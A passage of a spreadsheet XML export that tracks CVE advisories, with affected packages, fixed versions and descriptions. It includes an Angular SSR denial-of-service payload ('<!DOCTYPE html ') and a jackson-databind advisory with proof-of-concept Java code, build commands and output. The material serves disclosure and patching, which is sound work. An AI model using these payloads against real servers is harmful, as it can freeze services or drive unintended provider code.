          <t>20.3.31, 21.2.23, 22.1.6</t>
        </is>
      </c>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr"/>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>A Denial of Service (DoS) vulnerability exists in `@angular/platform-server`'s DOM emulation parser (`domino`). When processing untrusted user input containing an incomplete DOCTYPE declaration ending with whitespace before EOF (such as `&lt;!DOCTYPE html `), the HTML parser enters an infinite synchronous loop, pegging CPU utilization at 100% and completely freezing the Node.js server process.
### Technical Description
In Angular Server-Side Rendering (SSR), `@angular/platform-server` uses `domino` to parse and sanitize HTML bound through template bindings (such as `[innerHTML]`) or manipulated via DOM APIs.
In Domino's HTML parser (`lib/HTMLParser.js`), tokenizer states that specify fixed lookahead—such as `after_doctype_name_state` (`lookahead = 6`)—rely on the state handler function to explicitly advance the character index pointer (`nextchar`). While branches for whitespace, `&gt;`, and keyword matching advance `nextchar`, the EOF branch (`case -1: // EOF`) emitted doctype and EOF tokens without advancing `nextchar` or transitioning out of the state:
```javascript
case -1: // EOF
  forcequirks();
  emitDoctype();
  emitEOF();
  break;
```
Because `nextchar` remained unchanged pointing to the EOF marker character (`\uFFFF`), the scanner loop (`while (nextchar &lt; numchars)`) repeatedly re-invoked `after_doctype_name_state` with `codepoint = EOF` indefinitely. In Node.js's single-threaded runtime, this synchronous loop starves the event loop entirely.
### Impact &amp; Reachability
* **Reachability**: The vulnerability is reachable in any Angular SSR application where untrusted user input is bound to `[innerHTML]`, interpolated into markup, or sanitized on the server.
* **Impact**: Successful exploitation allows an unauthenticated remote attacker to cause an immediate Denial of Service (DoS) by sending a payload containing an incomplete DOCTYPE (e.g., `&lt;!DOCTYPE html `). The Node.js SSR process locks up at 100% CPU and ceases responding to all concurrent and subsequent HTTP requests.
**Proof of Concept:**
```ts
import { Component } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;div [innerHTML]="payload"&gt;&lt;/div&gt;`,
})
export class AppComponent {
  // Attacker-controlled input containing an incomplete DOCTYPE ending with whitespace
  payload = '&lt;!DOCTYPE html ';
}
```
### Workarounds
* Avoid binding untrusted user input directly to `[innerHTML]` in server-rendered templates; use standard text interpolation (`{{ userInput }}`) or `[textContent]` when raw HTML rendering is not required.
* Validate or sanitize user input before passing it to `[innerHTML]` on the server by stripping or rejecting strings matching `/^&lt;!DOCTYPE/i`.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101895</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10601</t>
        </is>
      </c>
      <c r="D317" s="5" t="inlineStr"/>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="inlineStr"/>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr"/>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Grafana: Path traversal in the Tempo and Loki data source plugins in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10601</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12249</t>
        </is>
      </c>
      <c r="D318" s="5" t="inlineStr"/>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="inlineStr"/>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/ubuntu/adsys</t>
        </is>
      </c>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr"/>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Canonical ADSys Uses a Less Trusted Source in github.com/ubuntu/adsys.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github.com/ubuntu/adsys before v0.16.3-0.20250318112551-8b1939f96d38.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12249</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="D319" s="5" t="inlineStr"/>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M319" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr"/>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>### Summary
A `java.nio.file.Path` field bound from untrusted JSON reaches `JDKFromStringDeserializer.NioPathHelper.deserialize`. The attacker string flows through `new URI(value)` → `Path.of(uri)`, then on `FileSystemNotFoundException` into a `ServiceLoader&lt;FileSystemProvider&gt;` enumeration that calls `provider.getPath(uri)` on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default `JsonMapper.builder().build()`.
Impact is bounded. The JDK built-in providers (`file`, `jar`/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding `Path` from untrusted input is already an anti-pattern.
### Description
`NioPathHelper.deserialize` performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via `ctxt.handleInstantiationProblem(...)`):
```java
int colonIx = value.indexOf(':');
if (colonIx &lt; 0) { return Path.of(value); }
...
final URI uri = new URI(value);          // attacker-controlled URI string
try {
    return Path.of(uri);                  // resolves scheme -&gt; may load a FileSystemProvider
} catch (FileSystemNotFoundException cause) {
    final String scheme = uri.getScheme();
    for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {
        if (provider.getScheme().equalsIgnoreCase(scheme)) {
            return provider.getPath(uri);  // attacker scheme selects &amp; drives a provider
        }
    }
    // no matching provider -&gt; ctxt.handleInstantiationProblem(...) (throws by default)
}
```
The attacker's scheme selects the provider and the attacker's URI is passed to it; the enumeration also forces provider classloading during `readValue`. For built-in schemes like `jar:`, `getPath` throws `FileSystemNotFoundException` (a mount requires explicit `newFileSystem`), surfacing as a wrapped `ValueInstantiationException` with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.java`
  - `STD_PATH` → `NioPathHelper.deserialize`; `NioPathHelper.deserialize` body 
       (`new URI` → `Path.of(uri)` → `ServiceLoader.load(FileSystemProvider.class)` → `provider.getPath(uri)`).
## Proof of Concept
Two PoCs are provided. 
&gt; PoC 2 registers a custom `FileSystemProvider` to show that attacker JSON reaches `provider.getPath(attackerURI)` inside `readValue`. Whether a third-party provider then does anything harmful is outside the library's control. The in-scope issue is **PoC 1** — the `jar:`/arbitrary-scheme path reaching the `ServiceLoader` fallback with no scheme restriction.
**PoC 1 — sink reached (built-in `jar` provider).** 
`com/poc/Vuln04_PathProvider.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import java.nio.file.Path;
/**
 * Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via
 * Path.of(uri) / ServiceLoader&lt;FileSystemProvider&gt;.
 */
public class Vuln04_PathProvider {
    public static class Config { public Path workdir; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        // jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.
        String json = "{\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}";
        System.out.println("Deserializing (default mapper): " + json);
        try {
            Config c = mapper.readValue(json, Config.class);
            System.out.println("Resolved Path = " + c.workdir + "  (class=" + (c.workdir==null?"null":c.workdir.getClass().getName()) + ")");
            System.out.println("RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue");
        } catch (Throwable t) {
            System.out.println("Throwable during resolution: " + t.getClass().getName() + ": " + t.getMessage());
            System.out.println("RESULT: VULNERABLE (attacker URI drove provider resolution; threw " + t.getClass().getSimpleName() + " inside readValue)");
        }
    }
}
```
**PoC 2 — scheme-selection mechanism demo (custom `FileSystemProvider`).**
A third-party provider (scheme `evilscheme`) registered via `META-INF/services/java.nio.file.spi.FileSystemProvider`, which is standing in for *any* provider a real application ships. 
`com/poc/EvilFileSystemProvider.java`:
```java
package com.poc;
import java.nio.file.*;
import java.nio.file.spi.FileSystemProvider;
import java.nio.file.attribute.*;
import java.net.URI;
import java.io.IOException;
import java.util.*;
import java.util.Set;
import java.nio.channels.SeekableByteChannel;
/**
 * A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the
 * scheme "evilscheme". It stands in for ANY third-party FileSystemProvider present on a real
 * application's classpath. Its static initializer and getPath() record that they executed,
 * proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)
 * inside jackson's readValue.
 */
public class EvilFileSystemProvider extends FileSystemProvider {
    public static volatile boolean STATIC_INIT_RAN = false;
    public static volatile String GET_PATH_URI = null;
    static { STATIC_INIT_RAN = true; }
    @Override public String getScheme() { return "evilscheme"; }
    @Override public Path getPath(URI uri) {
        GET_PATH_URI = uri.toString();
        System.out.println("&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: " + uri);
        // A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.
        return java.nio.file.Path.of(System.getProperty("java.io.tmpdir"), "evilprovider-marker");
    }
    // --- remaining abstract methods: minimal stubs ---
    @Override public FileSystem newFileSystem(URI uri, Map&lt;String,?&gt; env) { throw new UnsupportedOperationException(); }
    @Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }
    @Override public SeekableByteChannel newByteChannel(Path p, Set&lt;? extends OpenOption&gt; o, FileAttribute&lt;?&gt;... a) throws IOException { throw new UnsupportedOperationException(); }
    @Override public DirectoryStream&lt;Path&gt; newDirectoryStream(Path d, DirectoryStream.Filter&lt;? super Path&gt; f) { throw new UnsupportedOperationException(); }
    @Override public void createDirectory(Path d, FileAttribute&lt;?&gt;... a) { throw new UnsupportedOperationException(); }
    @Override public void delete(Path p) { throw new UnsupportedOperationException(); }
    @Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public boolean isSameFile(Path p, Path p2) { return false; }
    @Override public boolean isHidden(Path p) { return false; }
    @Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }
    @Override public void checkAccess(Path p, AccessMode... m) { }
    @Override public &lt;V extends FileAttributeView&gt; V getFileAttributeView(Path p, Class&lt;V&gt; t, LinkOption... o) { return null; }
    @Override public &lt;A extends BasicFileAttributes&gt; A readAttributes(Path p, Class&lt;A&gt; t, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public Map&lt;String,Object&gt; readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }
}
```
Registration descriptor —
`src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider`:
```
com.poc.EvilFileSystemProvider
```
Driver — `com/poc/Vuln04b_PathProviderMount.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
/**
 * Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via
 * META-INF/services (scheme "evilscheme") stands in for any provider on a real app's
 * classpath. Attacker JSON with that scheme drives jackson's ServiceLoader fallback to
 * (1) load the provider class (running its static initializer) and (2) invoke
 * provider.getPath(attackerUri) -- all inside readValue, with NO application code.
 */
public class Vuln04b_PathProviderMount {
    public static class Config { public java.nio.file.Path workdir; }
    public static void main(String[] args) throws Exception {
        System.out.println("Provider static-init ran before deserialization? " + EvilFileSystemProvider.STATIC_INIT_RAN);
        ObjectMapper mapper = JsonMapper.builder().build();   // default config
        String json = "{\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}";
        System.out.println("Deserializing (default mapper): " + json);
        Config c = mapper.readValue(json, Config.class);
        System.out.println("Resolved Path = " + c.workdir);
        System.out.println("Provider static-init ran: " + EvilFileSystemProvider.STATIC_INIT_RAN);
        System.out.println("Provider.getPath() attacker URI: " + EvilFileSystemProvider.GET_PATH_URI);
        boolean ok = EvilFileSystemProvider.GET_PATH_URI != null
                &amp;&amp; EvilFileSystemProvider.GET_PATH_URI.contains("attacker-controlled");
        System.out.println(ok
            ? "RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)"
            : "RESULT: NOT reproduced");
    }
}
```
## Execution Steps
The PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain `javac`/`java` . PoC 2 additionally requires the `META-INF/services` descriptor to be on the **runtime** classpath
```bash
# 0. Locate the three published dependency jars.
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
# 1. Compile the three sources.
cd poc-project
mkdir -p out
javac -cp "$CP" -d out \
  src/main/java/com/poc/EvilFileSystemProvider.java \
  src/main/java/com/poc/Vuln04_PathProvider.java \
  src/main/java/com/poc/Vuln04b_PathProviderMount.java
# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).
mkdir -p out/META-INF/services
cp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \
   out/META-INF/services/java.nio.file.spi.FileSystemProvider
# 3. Run both PoCs.
java -cp "out:$CP" com.poc.Vuln04_PathProvider        # PoC 1
java -cp "out:$CP" com.poc.Vuln04b_PathProviderMount  # PoC 2
```
## Reproduction Evidence
Executed against jackson-databind 3.2.1 (OpenJDK 25).
**PoC 1 :**
```
Deserializing (default mapper): {"workdir":"jar:file:/tmp/jackson_poc_evil.zip!/x"}
Throwable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`
 at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config["workdir"])
RESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)
```
Notes: the JDK **built-in** `jar` provider's `getPath` does not auto-mount (it also throws `FileSystemNotFoundException`, since only `newFileSystem` mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven `ServiceLoader` resolution during `readValue` with no allow-list. PoC 2 only illustrates the downstream mechanism.
**PoC 2  :**
```
Provider static-init ran before deserialization? true
Deserializing (default mapper): {"workdir":"evilscheme://attacker-controlled/target?x=1"}
&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1
Resolved Path = /var/folders/.../T/evilprovider-marker
Provider static-init ran: true
Provider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1
RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)
```
Purely from a JSON string, jackson's `ServiceLoader` fallback selected the attacker-named scheme's provider and invoked `provider.getPath(uri)` with the full attacker URI inside `readValue`. Whether a given provider then does anything harmful is outside the library's control; the in-scope issue is the absence of a scheme restriction before this fallback runs.
## Impact
Untrusted JSON drives `provider.getPath(attackerURI)` on an attacker-chosen provider during `readValue`. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the
scheme-restriction gap.
## Recommended Fix
1. **Restrict the resolved scheme to a fixed, hard-coded set** ; reject `jar:` and other schemes via `ctxt.handleWeirdStringValue(...)`. A hard-coded set keeps the fix backport-safe with no new configuration surface.
2. **Skip the `ServiceLoader&lt;FileSystemProvider&gt;` enumeration for disallowed schemes**, so untrusted JSON cannot select and drive an arbitrary registered provider.
3. Document that `java.nio.file.Path`-typed fields should not be bound from untrusted JSON.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32599</t>
        </is>
      </c>
      <c r="D320" s="5" t="inlineStr"/>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="inlineStr"/>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="M320" s="5" t="inlineStr">
        <is>
          <t>1.5.0</t>
        </is>
      </c>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr"/>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Netmaker has a boolean‑based SQL Injection in github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32599</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42127</t>
        </is>
      </c>
      <c r="D321" s="5" t="inlineStr"/>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="inlineStr"/>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr"/>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Grafana: Pre-authentication denial of service in the public dashboard query handler in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42127</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42129</t>
        </is>
      </c>
      <c r="D322" s="5" t="inlineStr"/>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="inlineStr"/>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr"/>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Grafana Loki datasource plugin's callResource handler contains a path traversal vulnerability. in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42129</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5139</t>
        </is>
      </c>
      <c r="D323" s="5" t="inlineStr"/>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="inlineStr"/>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M323" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr"/>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce administrator authorization on the {{setDefaultInstance}} call within the {{/gitlab connect}} command handler in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5139</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58197</t>
        </is>
      </c>
      <c r="D324" s="5" t="inlineStr"/>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="inlineStr"/>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="M324" s="5" t="inlineStr">
        <is>
          <t>0.30.1</t>
        </is>
      </c>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr"/>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>ToolHive: containerized MCP servers can reach host services via host.docker.internal, enabling lateral movement in github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58197</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58463</t>
        </is>
      </c>
      <c r="D325" s="5" t="inlineStr"/>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="inlineStr"/>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr"/>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58463</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
